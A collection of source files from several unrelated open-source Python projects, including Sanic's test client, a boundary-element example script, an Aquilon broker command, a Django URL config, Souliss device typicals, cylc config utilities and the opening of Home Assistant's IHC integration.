return response
def _sanic_endpoint_test(
self, method='get', uri='/', gather_request=True,
debug=False, server_kwargs={},
*request_args, **request_kwargs):
results = [None, None]
exceptions = []
if gather_request:
def _collect_request(request):
if results[0] is None:
results[0] = request
self.app.request_middleware.appendleft(_collect_request)
@self.app.listener('after_server_start')
async def _collect_response(sanic, loop):
try:
response = await self._local_request(
method, uri, *request_args,
**request_kwargs)
results[-1] = response
except Exception as e:
log.error(
'Exception:\n{}'.format(traceback.format_exc()))
exceptions.append(e)
self.app.stop()
self.app.run(host=HOST, debug=debug, port=PORT, **server_kwargs)
self.app.listeners['after_server_start'].pop()
if exceptions:
raise ValueError("Exception during request: {}".format(exceptions))
if gather_request:
try:
request, response = results
return request, response
except:
raise ValueError(
"Request and response object expected, got ({})".format(
results))
else:
try:
return results[-1]
except:
raise ValueError(
"Request object expected, got ({})".format(results))
def get(self, *args, **kwargs):
return self._sanic_endpoint_test('get', *args, **kwargs)
def post(self, *args, **kwargs):
return self._sanic_endpoint_test('post', *args, **kwargs)
def put(self, *args, **kwargs):
return self._sanic_endpoint_test('put', *args, **kwargs)
def delete(self, *args, **kwargs):
return self._sanic_endpoint_test('delete', *args, **kwargs)
def patch(self, *args, **kwargs):
return self._sanic_endpoint_test('patch', *args, **kwargs)
def options(self, *args, **kwargs):
return self._sanic_endpoint_test('options', *args, **kwargs)
def head(self, *args, **kwargs):
return self._sanic_endpoint_test('head', *args, **kwargs)
| jrocketfingers/sanic | sanic/testing.py | Python | mit | 3,419 |
import sys
import numpy as np
import matplotlib.pyplot as plt
from codim1.core import *
from codim1.assembly import *
from codim1.fast_lib import *
from codim1.post import *
import codim1.core.tools as tools
x_pts = 30
y_pts = 30
n_elements = 40
degree = 1
quad_min = degree + 1
quad_max = 3 * degree
quad_logr = 3 * degree + 1
quad_oneoverr = 3 * degree + 1
interior_quad_pts = 13
ek = ElasticKernelSet(1.0, 0.25)
left_end = np.array((-1.0, 0.0))
right_end = np.array((1.0, -0.0))
mesh = simple_line_mesh(n_elements, left_end, right_end)
# tools.plot_mesh(mesh)
# plt.show()
bf = basis_from_degree(degree)
qs = QuadStrategy(mesh, quad_min, quad_max, quad_logr, quad_oneoverr)
apply_to_elements(mesh, "basis", bf, non_gen = True)
apply_to_elements(mesh, "continuous", True, non_gen = True)
apply_to_elements(mesh, "qs", qs, non_gen = True)
apply_to_elements(mesh, "bc",
BC("crack_displacement", ConstantBasis([1.0, 0.0])),
non_gen = True)
sgbem_dofs(mesh)
matrix, rhs = sgbem_assemble(mesh, ek)
import ipdb;ipdb.set_trace()
soln_coeffs = np.linalg.solve(matrix, rhs)
x, u, t = evaluate_boundary_solution(mesh, soln_coeffs, 8)
plt.figure(1)
def plot_tx():
plt.plot(x[0, :], t[0, :])
plt.xlabel(r'X')
plt.ylabel(r'$t_x$', fontsize = 18)
def plot_ty():
plt.plot(x[0, :], t[1, :])
plt.xlabel(r'X')
plt.ylabel(r'$t_y$', fontsize = 18)
plot_tx()
# plt.plot(x[0, :], correct)
plt.figure()
plot_ty()
plt.show()
# tx = t[0, :]
# ty = t[1, :]
# distance_to_left = np.sqrt((x[:, 0] - left_end[0]) ** 2 +
# (x[:, 1] - left_end[1]) ** 2)
#
# x = np.linspace(-5, 5, x_pts)
# # Doesn't sample 0.0!
# y = np.linspace(-15, 15, y_pts)
# X, Y = np.meshgrid(x, y)
#
# x = np.linspace(-5, 5, x_pts)
# # Doesn't sample 0.0!
# y = np.linspace(-5, 5, y_pts)
# sxx = np.zeros((x_pts, y_pts))
# sxy = np.zeros((x_pts, y_pts))
# sxy2 = np.zeros((x_pts, y_pts))
# syy = np.zeros((x_pts, y_pts))
# displacement = np.zeros((x_pts, y_pts, 2))
# def fnc(x,d):
# if d == 0 and x[0] <= 1.0 and x[0] >= -1.0:
# return 1.0
# return 0.0
# # displacement_func = BasisFunctions.from_function(fnc)
# #
# # ip = InteriorPoint(mesh, dh, qs)
# # for i in range(x_pts):
# # print i
# # for j in range(y_pts):
# # displacement[j, i, :] += ip.compute((x[i], y[j]),
# # np.array([0.0, 0.0]),
# # k_t, displacement_func)
# # # sxx[j, i], sxy[j, i] = 0.5 * point_src(np.array(x[i], y[j]),
# # # np.array((0.0, 1.0)))
# # # sxy2[j, i], syy[j, i] = 0.5 * point_src(np.array(x[i], y[j]),
# # # np.array((1.0, 0.0)))
# # int_ux = displacement[:, :, 0]
# # int_uy = displacement[:, :, 1]
# #
# # plt.figure(7)
# # plt.imshow(int_ux)
# # plt.title(r'Derived $u_x$')
# # plt.colorbar()
# #
# # plt.figure(8)
# # plt.imshow(int_uy)
# # plt.title(r'Derived $u_y$')
# # plt.colorbar()
#
# # plt.figure(9)
# # plt.imshow(sxy)
# # plt.title(r'Derived $s_{xy}$')
# # plt.colorbar()
# #
# # plt.figure(10)
# # plt.imshow(sxx)
# # plt.title(r'Derived $s_{xx}$')
# # plt.colorbar()
# # plt.figure(11)
# # plt.imshow(sxy2)
# # plt.title(r'Derived $s_{xy2}$')
# # plt.colorbar()
# #
# # plt.figure(12)
# # plt.imshow(syy)
# # plt.title(r'Derived $s_{yy}$')
# # plt.colorbar()
# # plt.figure(11)
# # plt.imshow(int_ux - exact_grid_ux)
# # plt.title(r'Error in $u_x$')
# # plt.colorbar()
#
# plt.show()
| tbenthompson/codim1 | examples/dislocation.py | Python | mit | 3,530 |
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2009,2010,2011,2012,2013,2014,2015 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq search machine`."""
from sqlalchemy.orm import subqueryload, joinedload, undefer
from aquilon.exceptions_ import NotFoundException
from aquilon.aqdb.types import CpuType
from aquilon.aqdb.model import (Machine, Model, Cluster, ClusterResource,
HostResource, Resource, Share, Filesystem, Disk,
VirtualDisk, MetaCluster, DnsRecord, Chassis,
ChassisSlot)
from aquilon.utils import force_wwn
from aquilon.worker.broker import BrokerCommand
from aquilon.worker.dbwrappers.hardware_entity import (
search_hardware_entity_query)
from aquilon.worker.dbwrappers.host import hostname_to_host
from aquilon.worker.formats.list import StringAttributeList
class CommandSearchMachine(BrokerCommand):
required_parameters = []
disk_option_map = {
'disk_name': ('device_name', None),
'disk_size': ('capacity', None),
'disk_controller': ('controller_type', None),
'disk_wwn': ('wwn', force_wwn),
'disk_address': ('address', None),
'disk_bus_address': ('bus_address', None),
}
def render(self, session, hostname, machine, cpuname, cpuvendor, cpucount,
memory, cluster, metacluster, vmhost, share, disk_share,
disk_filesystem, uuid, chassis, slot, fullinfo, style, **arguments):
if share:
self.deprecated_option("share", "Please use --disk_share instead.",
**arguments)
disk_share = share
if fullinfo or style != 'raw':
q = search_hardware_entity_query(session, Machine, **arguments)
else:
q = search_hardware_entity_query(session, Machine.label, **arguments)
if machine:
q = q.filter_by(label=machine)
if hostname:
dns_rec = DnsRecord.get_unique(session, fqdn=hostname, compel=True)
q = q.filter(Machine.primary_name_id == dns_rec.id)
if cpuname or cpuvendor:
subq = Model.get_matching_query(session, name=cpuname,
vendor=cpuvendor,
model_type=CpuType.Cpu, compel=True)
q = q.filter(Machine.cpu_model_id.in_(subq))
if cpucount is not None:
q = q.filter_by(cpu_quantity=cpucount)
if memory is not None:
q = q.filter_by(memory=memory)
if uuid is not None:
q = q.filter_by(uuid=uuid)
if cluster:
dbcluster = Cluster.get_unique(session, cluster, compel=True)
# TODO: disallow metaclusters here
if isinstance(dbcluster, MetaCluster):
q = q.join(Machine.vm_container, ClusterResource, Cluster,
aliased=True)
q = q.filter_by(metacluster=dbcluster)
else:
q = q.join(Machine.vm_container, ClusterResource, aliased=True)
q = q.filter_by(cluster=dbcluster)
q = q.reset_joinpoint()
elif metacluster:
dbmeta = MetaCluster.get_unique(session, metacluster, compel=True)
q = q.join(Machine.vm_container, ClusterResource, Cluster,
aliased=True)
q = q.filter_by(metacluster=dbmeta)
q = q.reset_joinpoint()
elif vmhost:
dbhost = hostname_to_host(session, vmhost)
q = q.join(Machine.vm_container, HostResource, aliased=True)
q = q.filter_by(host=dbhost)
q = q.reset_joinpoint()
# Translate disk options to column matches
disk_options = {}
for arg_name, (col_name, transform) in self.disk_option_map.items():
val = arguments.get(arg_name, None)
if val is not None:
if transform:
val = transform(arg_name, val)
disk_options[col_name] = val
if disk_share or disk_filesystem or disk_options:
if disk_share:
v2shares = session.query(Share.id).filter_by(name=disk_share)
if not v2shares.count():
raise NotFoundException("No shares found with name {0}."
.format(share))
q = q.join(Machine.disks.of_type(VirtualDisk), aliased=True)
elif disk_filesystem:
# If --cluster was also given, then we could verify if the named
# filesystem is attached to the cluster - potentially inside a
# resourcegroup. It's not clear if that would worth the effort.
q = q.join(Machine.disks.of_type(VirtualDisk), aliased=True)
else:
q = q.join(Disk, aliased=True)
if disk_options:
q = q.filter_by(**disk_options)
if disk_share:
q = q.join(Resource, Share, aliased=True, from_joinpoint=True)
q = q.filter_by(name=disk_share)
elif disk_filesystem:
q = q.join(Resource, Filesystem, aliased=True,
from_joinpoint=True)
q = q.filter_by(name=disk_filesystem)
q = q.reset_joinpoint()
if chassis or slot is not None:
q = q.join(ChassisSlot, aliased=True)
if chassis:
dbchassis = Chassis.get_unique(session, chassis, compel=True)
q = q.filter_by(chassis=dbchassis)
if slot is not None:
q = q.filter_by(slot_number=slot)
q = q.reset_joinpoint()
if fullinfo or style != "raw":
q = q.options(undefer('comments'),
joinedload('location'),
subqueryload('interfaces'),
joinedload('interfaces.assignments'),
joinedload('interfaces.assignments.dns_records'),
joinedload('chassis_slot'),
subqueryload('chassis_slot.chassis'),
subqueryload('disks'),
undefer('disks.comments'),
joinedload('host'),
undefer('host.comments'),
undefer('host.personality_stage.personality.archetype.comments'),
subqueryload('host.services_used'),
subqueryload('host._cluster'),
joinedload('host._cluster.cluster'))
return q.all()
return StringAttributeList(q.all(), "label")
| guillaume-philippon/aquilon | lib/aquilon/worker/commands/search_machine.py | Python | apache-2.0 | 7,348 |
from django.conf.urls.defaults import *
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
(r'^admin/', include(admin.site.urls)),
(r'^sentry/', include('sentry.urls')),
)
urlpatterns += patterns('django.views.generic.simple',
(r'^$', 'direct_to_template', {'template': 'site_index.html'})
) | tmitchell/django-watchdog | urls.py | Python | bsd-3-clause | 336 |
import logging
import struct
_LOGGER = logging.getLogger(__name__)
typical_types = {
0x11: {
"desc": "T11: ON/OFF Digital Output with Timer Option", "size": 1,
"name": "Switch Timer",
"state_desc": { 0x00: "off",
0x01: "on"}
},
0x12: {"desc": "T12: ON/OFF Digital Output with AUTO mode",
"size": 1,
"name": "Switch auto",
"state_desc": { 0x00: "off",
0x01: "on",
0xF0: "on/auto",
0xF1: "off/auto"
}
},
0x13: {"desc": "T13: Digital Input Value",
"size": 1,
"state_desc": { 0x00: "off",
0x01: "on"}
},
0x14: {"desc": "T14: Pulse Digital Output",
"size": 1,
"name": "Switch",
"state_desc": { 0x00: "off",
0x01: "on"}
},
0x15: {"desc": "T15: RGB Light",
"size": 2,
"state_desc": { 0x00: "off",
0x01: "on"}
},
0x16: {"desc": "T16: RGB LED Strip",
"size": 4,
"state_desc": { 0x00: "on",
0x01: "on"}
},
0x18: {"desc": "T18: ON/OFF Digital Output (Step Relay)",
"size": 1,
"state_desc": { 0x00: "off",
0x01: "on"}
},
0x19: {"desc": "T19: Single Color LED Strip",
"size": 2,
"state_desc": { 0x00: "off",
0x01: "on"}
},
0x1A: {"desc": "T1A: Digital Input Pass Through",
"size": 1,
"state_desc": { 0x00: "off",
0x01: "on"}
},
0x1B: {"desc": "T1B: Position Constrained ON/OFF Digital Output", "size": 1},
0x21: {"desc": "T21: Motorized devices with limit switches", "size": 1},
0x22: {"desc": "T22: Motorized devices with limit switches and middle position", "size": 1},
0x31: {"desc": "T31: Temperature control with cooling and heating mode", "size": 5},
0x32: {"desc": "T32: Air Conditioner", "size": 2},
0x41: {"desc": "T41: Anti-theft integration -Main-", "size": 1},
0x42: {"desc": "T42: Anti-theft integration -Peer-", "size": 1},
0x51: {"desc": "T51: Analog input, half-precision floating point",
"size": 2,
"units": "units"},
0x52: {"desc": "T52: Temperature measure (-20, +50) C",
"size": 2,
"units": "C"},
0x53: {"desc": "T53: Humidity measure (0, 100) ",
"size": 2,
"units": "%"},
0x54: {"desc": "T54: Light Sensor (0, 40) kLux",
"size": 2,
"units": "kLux"},
0x55: {"desc": "T55: Voltage (0, 400) V",
"size": 2,
"units": "V"},
0x56: {"desc": "T56: Current (0, 25) A",
"size": 2,
"units": "A"},
0x57: {"desc": "T57: Power (0, 6500) W",
"size": 2,
"units": "W"},
0x58: {"desc": "T58: Pressure measure (0, 1500) hPa",
"size": 2,
"units": "hPa"},
0x61: {"desc": "T61: Analog setpoint, half-precision floating point", "size": 2},
0x62: {"desc": "T62: Temperature measure (-20, +50) C", "size": 2},
0x63: {"desc": "T63: Humidity measure (0, 100) ", "size": 2},
0x64: {"desc": "T64: Light Sensor (0, 40) kLux", "size": 2},
0x65: {"desc": "T65: Voltage (0, 400) V", "size": 2},
0x66: {"desc": "T66: Current (0, 25) A", "size": 2},
0x67: {"desc": "T67: Power (0, 6500) W", "size": 2},
0x68: {"desc": "T68: Pressure measure (0, 1500) hPa", "size": 2}
}
class Typical(object):
def __init__(self, ttype):
self.ttype = ttype
self.description = typical_types[ttype]['desc']
self.size = typical_types[ttype]['size']
self.slot = -1 # undefined until assigned to a slot
self.node = -1 # undefined until assigned to a slot
# inital state. It will be overwritten with the first update
self.state = b'\x00\x00\x00\x00\x00\x00\x00'
self.listeners = []
def add_listener(self, callback):
self.listeners.append(callback)
@staticmethod
def factory_type(ttype):
if ttype in [0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x18, 0x19, 0x1A, 0x1B]:
return TypicalT1n(ttype)
elif ttype in [0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58]:
return TypicalT5n(ttype)
else:
return TypicalNotImplemented(ttype)
def update(self, value):
value = value[:self.size]
if value != self.state:
self.state = value
self.state_description = value
_LOGGER.info("Node %d: Typical %d - %s updated from %s to %s" % (self.index,
self.description,
':'.join("{:02x}".format(c) for c in self.state[:self.size]),
':'.join("{:02x}".format(c) for c in value[:self.size])))
for listener in self.listeners:
listener(self)
"""
if self.mqtt:
# TODO: este self....
print("Publico mi nuevo estado %s" + self.state)
self.mqttc.publish('souliss/%s/%s/state' % (self.device_class, self.name), self.state)
"""
"""
def publish(self, mqttc):
if self.mqtt:
self.mqttc = mqttc
self.device_class = typical_types[self.ttype]['mqtt']
mqttc.publish('souliss/%s/%s/config' % (self.device_class, self.name),
'{"name" : "' + self.friendly_name + '", ' +
'"payload_on": "01", ' +
'"payload_off": "00", ' +
'"optimistic": false, ' +
'"retain": true, ' +
'"command_topic": "souliss/%s/%s/set", "state_topic": "souliss/%s/%s/state"}' \
% (self.device_class, self.name, self.device_class, self.name))
#'{"name" : "once,", "payload_on": "0", "payload_off": "1", "optimistic": false, "retain": true, "state_topic": "souliss/switch/%s", "command_topic": "souliss/switch/%s/set"}' % (self.name, self.name))
#mqttc.subscribe("souliss/%s/%s/#" % (self.device_class, self.name))
#mqttc.subscribe("souliss/switch/%s" % self.name)
else:
print('WARNING: I do not know mqtt device for ' + self.description)
"""
def set_node_slot_index(self, node, slot, index):
self.node = node
self.slot = slot
self.index = index
def to_dict(self):
return {'ddesc': self.description,
'slo': self.slot,
'typ': self.ttype}
class TypicalT1n(Typical):
def __init__(self, ttype):
super(TypicalT1n,self).__init__(ttype)
self.state_desc = typical_types[ttype]['state_desc']
def update(self, value):
value = value[:self.size]
if value != self.state:
self.state = value
if self.size > 1: # Raw description for Typicals T15, T16 and T19
self.state_description = ':'.join("{:02x}".format(c) for c in self.state)
else:
if ord(value) in self.state_desc.keys():
self.state_description = self.state_desc[ord(value)]
else:
_LOGGER.warning("Unknow value!")
self.state_description = "Unknow value!"
_LOGGER.info("Node %d: Typical %d - %s updated to %s" % (self.node, self.index,
self.description,
self.state_description))
for listener in self.listeners:
listener(self)
def send_command(self, command):
# TODO: Handle different T1 behaviour
if command == 0x01: # Toggle
if self.state == chr(1):
self.update(chr(0))
else:
self.update(chr(1))
elif command == 0x02: # OnCmd
self.update(chr(0))
elif command == 0x04: # OffCmd
self.update(chr(1))
else:
_LOGGER.debug('Command %x not implemented' % command)
class TypicalT5n(Typical):
def __init__(self, ttype):
super(TypicalT5n,self).__init__(ttype)
self.units= typical_types[ttype]['units']
def update(self, value):
value = value[:self.size]
if value != self.state:
self.state_description = struct.unpack('e', value)[0]
self.state = value
_LOGGER.info("Node %d: Typical %d - %s updated to %s %s" % (self.node, self.index,
self.description,
self.state_description,
self.units))
for listener in self.listeners:
listener(self)
class TypicalNotImplemented(Typical):
def __init__(self, ttype):
_LOGGER.warning('Typical %x not implemented' % ttype)
super(TypicalNotImplemented,self).__init__(ttype)
| maoterodapena/pysouliss | souliss/Typicals.py | Python | mit | 9,295 |
#!/usr/bin/env python
# THIS FILE IS PART OF THE CYLC SUITE ENGINE.
# Copyright (C) 2008-2016 NIWA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Utility functions for printing and manipulating PARSEC NESTED DICTS.
The copy and override functions below assume values are either dicts
(nesting) or shallow collections of simple types.
"""
import sys
from copy import copy
from parsec.OrderedDict import OrderedDictWithDefaults
def listjoin(lst, none_str=''):
"""Return string from joined list.
Quote all elements if any of them contain comment or list-delimiter
characters (currently quoting must be consistent across all elements).
Note: multi-line values in list is not handle.
"""
if not lst:
# empty list
return none_str
items = []
for item in lst:
if item is None:
items.append(none_str)
elif any([char in str(item) for char in ',#"\'']):
items.append(repr(item)) # will be quoted
else:
items.append(str(item))
return ', '.join(items)
def printcfg(cfg, level=0, indent=0, prefix='', none_str='',
handle=sys.stdout):
"""Pretty-print a parsec config item or section (nested dict).
As returned by parse.config.get().
"""
stack = [("", cfg, level, indent)]
while stack:
key_i, cfg_i, level_i, indent_i = stack.pop()
spacer = " " * 4 * (indent_i - 1)
if isinstance(cfg_i, dict):
if not cfg_i and none_str is None:
# Don't print empty sections if none_str is None. This does not
# handle sections with no items printed because the values of
# all items are empty or None.
continue
if key_i and level_i:
# Print heading
handle.write("%s%s%s%s%s\n" % (
prefix, spacer, '[' * level_i, str(key_i), ']' * level_i))
# Nested sections are printed after normal settings
subsections = []
values = []
for key, item in cfg_i.items():
if isinstance(item, dict):
subsections.append((key, item, level_i + 1, indent_i + 1))
else:
values.append((key, item, level_i + 1, indent_i + 1))
stack += reversed(subsections)
stack += reversed(values)
else:
key = ""
if key_i:
key = "%s = " % key_i
if cfg_i is None:
value = none_str
elif isinstance(cfg_i, list):
value = listjoin(cfg_i, none_str)
elif "\n" in str(cfg_i) and key:
value = '"""\n%s\n"""' % (cfg_i)
else:
value = str(cfg_i)
if value is not None:
handle.write("%s%s%s%s\n" % (prefix, spacer, key, value))
def replicate(target, source):
"""Replicate source *into* target.
Source elements need not exist in target already, so source overrides
common elements in target and otherwise adds elements to it.
"""
if not source:
target = OrderedDictWithDefaults()
return
if hasattr(source, "defaults_"):
target.defaults_ = pdeepcopy(source.defaults_)
for key, val in source.items():
if isinstance(val, dict):
if key not in target:
target[key] = OrderedDictWithDefaults()
if hasattr(val, 'defaults_'):
target[key].defaults_ = pdeepcopy(val.defaults_)
replicate(target[key], val)
elif isinstance(val, list):
target[key] = val[:]
else:
target[key] = val
def pdeepcopy(source):
"""Make a deep copy of a pdict source"""
target = OrderedDictWithDefaults()
replicate(target, source)
return target
def poverride(target, sparse):
"""Override items in a target pdict.
Target sub-dicts must already exist.
"""
if not sparse:
target = OrderedDictWithDefaults()
return
for key, val in sparse.items():
if isinstance(val, dict):
poverride(target[key], val)
elif isinstance(val, list):
target[key] = val[:]
else:
target[key] = val
def m_override(target, sparse):
"""Override items in a target pdict.
Target keys must already exist unless there is a "__MANY__" placeholder in
the right position.
"""
if not sparse:
target = OrderedDictWithDefaults()
return
stack = [(sparse, target, [], OrderedDictWithDefaults())]
defaults_list = []
while stack:
source, dest, keylist, many_defaults = stack.pop(0)
if many_defaults:
defaults_list.append((dest, many_defaults))
for key, val in source.items():
if isinstance(val, dict):
if key in many_defaults:
child_many_defaults = many_defaults[key]
else:
child_many_defaults = OrderedDictWithDefaults()
if key not in dest:
if '__MANY__' in dest:
dest[key] = OrderedDictWithDefaults()
child_many_defaults = dest['__MANY__']
elif '__MANY__' in many_defaults:
# A 'sub-many' dict - would it ever exist in real life?
dest[key] = OrderedDictWithDefaults()
child_many_defaults = many_defaults['__MANY__']
elif key in many_defaults:
dest[key] = OrderedDictWithDefaults()
else:
# TODO - validation prevents this, but handle properly
# for completeness.
raise Exception(
"parsec dict override: no __MANY__ placeholder" +
"%s" % (keylist + [key])
)
stack.append(
(val, dest[key], keylist + [key], child_many_defaults))
else:
if key not in dest:
if ('__MANY__' in dest or key in many_defaults or
'__MANY__' in many_defaults):
if isinstance(val, list):
dest[key] = val[:]
else:
dest[key] = val
else:
# TODO - validation prevents this, but handle properly
# for completeness.
raise Exception(
"parsec dict override: no __MANY__ placeholder" +
"%s" % (keylist + [key])
)
if isinstance(val, list):
dest[key] = val[:]
else:
dest[key] = val
for dest_dict, defaults in defaults_list:
dest_dict.defaults_ = defaults
def un_many(cfig):
"""Remove any '__MANY__' items from a nested dict, in-place."""
if not cfig:
return
for key, val in cfig.items():
if key == '__MANY__':
try:
del cfig[key]
except KeyError:
if hasattr(cfig, 'defaults_') and key in cfig.defaults_:
del cfig.defaults_[key]
else:
raise
elif isinstance(val, dict):
un_many(cfig[key])
def itemstr(parents=None, item=None, value=None):
"""
Pretty-print an item from list of sections, item name, and value
E.g.: ([sec1, sec2], item, value) to '[sec1][sec2]item = value'.
"""
if parents:
keys = copy(parents)
if value and not item:
# last parent is the item
item = keys[-1]
keys.remove(item)
text = '[' + ']['.join(keys) + ']'
else:
text = ''
if item:
text += str(item)
if value:
text += " = " + str(value)
if not text:
text = str(value)
return text
if __name__ == "__main__":
print 'Item strings:'
print ' ', itemstr(['sec1', 'sec2'], 'item', 'value')
print ' ', itemstr(['sec1', 'sec2'], 'item')
print ' ', itemstr(['sec1', 'sec2'])
print ' ', itemstr(['sec1'])
print ' ', itemstr(item='item', value='value')
print ' ', itemstr(item='item')
print ' ', itemstr(value='value')
# error or useful?
print ' ', itemstr(parents=['sec1', 'sec2'], value='value')
print 'Configs:'
printcfg('foo', prefix=' > ')
printcfg(['foo', 'bar'], prefix=' > ')
printcfg({}, prefix=' > ')
printcfg({'foo': 1}, prefix=' > ')
printcfg({'foo': None}, prefix=' > ')
printcfg({'foo': None}, none_str='(none)', prefix=' > ')
printcfg({'foo': {'bar': 1}}, prefix=' > ')
printcfg({'foo': {'bar': None}}, prefix=' > ')
printcfg({'foo': {'bar': None}}, none_str='(none)', prefix=' > ')
printcfg({'foo': {'bar': 1, 'baz': 2, 'qux': {'boo': None}}},
none_str='(none)', prefix=' > ')
| benfitzpatrick/cylc | lib/parsec/util.py | Python | gpl-3.0 | 9,720 |
"""Support for IHC devices."""
import logging
import os.path
from defusedxml import ElementTree
from ihcsdk.ihccontroller import IHCController
import voluptuous as vol
from homeassistant.components.binary_sensor import DEVICE_CLASSES_SCHEMA
from homeassistant.config import load_yaml_config_file
from homeassistant.const import (
CONF_ID,
CONF_NAME,
CONF_PASSWORD,
CONF_TYPE,
CONF_UNIT_OF_MEASUREMENT,
CONF_URL,
CONF_USERNAME,
TEMP_CELSIUS,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers import discovery
import homeassistant.helpers.config_validation as cv
from .const import (
ATTR_CONTROLLER_ID,
ATTR_IHC_ID,
ATTR_VALUE,
CONF_AUTOSETUP,
CONF_BINARY_SENSOR,
CONF_DIMMABLE,
CONF_INFO,
CONF_INVERTING,
CONF_LIGHT,
CONF_NODE,
CONF_NOTE,
CONF_OFF_ID,
CONF_ON_ID,
CONF_POSITION,
CONF_SENSOR,
CONF_SWITCH,
CONF_XPATH,
SERVICE_PULSE,
SERVICE_SET_RUNTIME_VALUE_BOOL,
SERVICE_SET_RUNTIME_VALUE_FLOAT,
SERVICE_SET_RUNTIME_VALUE_INT,
)
from .util import async_pulse
_LOGGER = logging.getLogger(__name__)
AUTO_SETUP_YAML = "ihc_auto_setup.yaml"
DOMAIN = "ihc"
IHC_CONTROLLER = "controller"
IHC_INFO = "info"
PLATFORMS = ("binary_sensor", "light", "sensor", "switch")
def validate_name(config):
"""Validate the device name."""
if CONF_NAME in config:
return config
ihcid = config[CONF_ID]
name = f"ihc_{ihcid}"
config[CONF_NAME] = name
return config
DEVICE_SCHEMA = vol.Schema(
{
vol.Required(CONF_ID): cv.positive_int,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_NOTE): cv.string,
vol.Optional(CONF_POSITION): cv.string,
}
)
SWITCH_SCHEMA = DEVICE_SCHEMA.extend(
{
vol.Optional(CONF_OFF_ID, default=0): cv.positive_int,
vol.Optional(CONF_ON_ID, default=0): cv.positive_int,
}
)
BINARY_SENSOR_SCHEMA = DEVICE_SCHEMA.extend(
{
vol.Optional(CONF_INVERTING, default=False): cv.boolean,
vol.Optional(CONF_TYPE): DEVICE_CLASSES_SCHEMA,
}
)
LIGHT_SCHEMA = DEVICE_SCHEMA.extend(
{
vol.Optional(CONF_DIMMABLE, default=False): cv.boolean,
vol.Optional(CONF_OFF_ID, default=0): cv.positive_int,
vol.Optional(CONF_ON_ID, default=0): cv.positive_int,
}
)
SENSOR_SCHEMA = DEVICE_SCHEMA.extend(
{vol.Optional(CONF_UNIT_OF_MEASUREMENT, default=TEMP_CELSIUS): cv.string}
)
IHC_SCHEMA = vol.Schema(
{
vol.Required(CONF_PASSWORD): cv.string,
vol.Required(CONF_URL): cv.string,
vol.Required(CONF_USERNAME): cv.string,
vol.Optional(CONF_AUTOSETUP, default=True): cv.boolean,
vol.Optional(CONF_BINARY_SENSOR, default=[]): vol.All(
cv.ensure_list, [vol.All(BINARY_SENSOR_SCHEMA, validate_name)]
),
vol.Optional(CONF_INFO, default=True): cv.boolean,
vol.Optional(CONF_LIGHT, default=[]): vol.All(
cv.ensure_list, [vol.All(LIGHT_SCHEMA, validate_name)]
),
vol.Optional(CONF_SENSOR, default=[]): vol.All(
cv.ensure_list, [vol.All(SENSOR_SCHEMA, validate_name)]
),
vol.Optional(CONF_SWITCH, default=[]): vol.All(
cv.ensure_list, [vol.All(SWITCH_SCHEMA, validate_name)]
),
}
)
CONFIG_SCHEMA = vol.Schema(
{DOMAIN: vol.Schema(vol.All(cv.ensure_list, [IHC_SCHEMA]))}, extra=vol.ALLOW_EXTRA
)
AUTO_SETUP_SCHEMA = vol.Schema(
{
vol.Optional(CONF_BINARY_SENSOR, default=[]): vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Required(CONF_NODE): cv.string,
vol.Required(CONF_XPATH): cv.string,
vol.Optional(CONF_INVERTING, default=False): cv.boolean,
vol.Optional(CONF_TYPE): cv.string,
}
)
],
),
vol.Optional(CONF_LIGHT, default=[]): vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Required(CONF_NODE): cv.string,
vol.Required(CONF_XPATH): cv.string,
vol.Optional(CONF_DIMMABLE, default=False): cv.boolean,
}
)
],
),
vol.Optional(CONF_SENSOR, default=[]): vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Required(CONF_NODE): cv.string,
vol.Required(CONF_XPATH): cv.string,
vol.Optional(
CONF_UNIT_OF_MEASUREMENT, default=TEMP_CELSIUS
): cv.string,
}
)
],
),
vol.Optional(CONF_SWITCH, default=[]): vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Required(CONF_NODE): cv.string,
vol.Required(CONF_XPATH): cv.string,
}
)
],
),
}
)
SET_RUNTIME_VALUE_BOOL_SCHEMA = vol.Schema(
{
vol.Required(ATTR_IHC_ID): cv.positive_int,
vol.Required(ATTR_VALUE): cv.boolean,
vol.Optional(ATTR_CONTROLLER_ID, default=0): cv.positive_int,
}
)
SET_RUNTIME_VALUE_INT_SCHEMA = vol.Schema(
{
vol.Required(ATTR_IHC_ID): cv.positive_int,
vol.Required(ATTR_VALUE): vol.Coerce(int),
vol.Optional(ATTR_CONTROLLER_ID, default=0): cv.positive_int,
}
)
SET_RUNTIME_VALUE_FLOAT_SCHEMA = vol.Schema(
{
vol.Required(ATTR_IHC_ID): cv.positive_int,
vol.Required(ATTR_VALUE): vol.Coerce(float),
vol.Optional(ATTR_CONTROLLER_ID, default=0): cv.positive_int,
}
)
PULSE_SCHEMA = vol.Schema(
{
vol.Required(ATTR_IHC_ID): cv.positive_int,
vol.Optional(ATTR_CONTROLLER_ID, default=0): cv.positive_int,
}
)
def setup(hass, config):
"""Set up the IHC integration."""
conf = config.get(DOMAIN)
for index, controller_conf in enumerate(conf):
if not ihc_setup(hass, config, controller_conf, index):
return False
return True
def ihc_setup(hass, config, conf, controller_id):
